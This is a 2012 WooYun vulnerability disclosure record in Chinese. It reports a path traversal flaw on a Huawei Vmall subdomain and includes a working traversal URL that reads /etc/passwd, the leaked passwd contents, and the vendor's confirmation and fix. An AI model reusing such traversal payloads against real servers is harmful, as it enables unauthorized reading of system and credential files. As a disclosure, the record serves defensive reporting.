漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-011340
漏洞标题:华为商城任意文件遍历
相关厂商:华为技术有限公司
漏洞作者: unshell
提交时间:2012-08-25 22:51
修复时间:2012-10-09 22:52
公开时间:2012-10-09 22:52
漏洞类型:任意文件遍历/下载
危害等级:低
自评Rank:1
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-08-25: 细节已通知厂商并且等待厂商处理中
2012-08-27: 厂商已经确认,细节仅向厂商公开
2012-09-06: 细节向核心白帽子及相关领域专家公开
2012-09-16: 细节向普通白帽子公开
2012-09-26: 细节向实习白帽子公开
2012-10-09: 细节向公众公开
简要描述:
华为商城子站目录遍历漏洞 导致帐号泄露
详细说明:
http://browser.vmall.com/agentreport/getLinkImageShow?linkImage=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
漏洞证明:
100:x:100:101:User for D-BUS:/var/run/dbus:/bin/false
101:x:101:102:User for haldaemon:/var/run/hal:/bin/false
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
gdm:x:50:104:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
haldaemon:x:101:102:User for haldaemon:/var/run/hal:/bin/false
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
messagebus:x:100:101:User for D-BUS:/var/run/dbus:/bin/false
news:x:9:13:News system:/etc/news:/bin/bash
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
ntp:x:74:103:NTP daemon:/var/lib/ntp:/bin/false
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
root:x:0:0:root:/root:/bin/bash
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
suse-ncc:x:102:105:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
nagios:x:1000:100::/home/nagios:/bin/bash
zabbix:x:1001:1000::/home/zabbix:/bin/false
修复方案:
华为技术员如云...
版权声明:转载请注明来源 unshell@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2012-08-27 14:31
厂商回复:
已经通知项目组整改,谢谢白帽子支持!
最新状态:
2012-09-12:已经整改完毕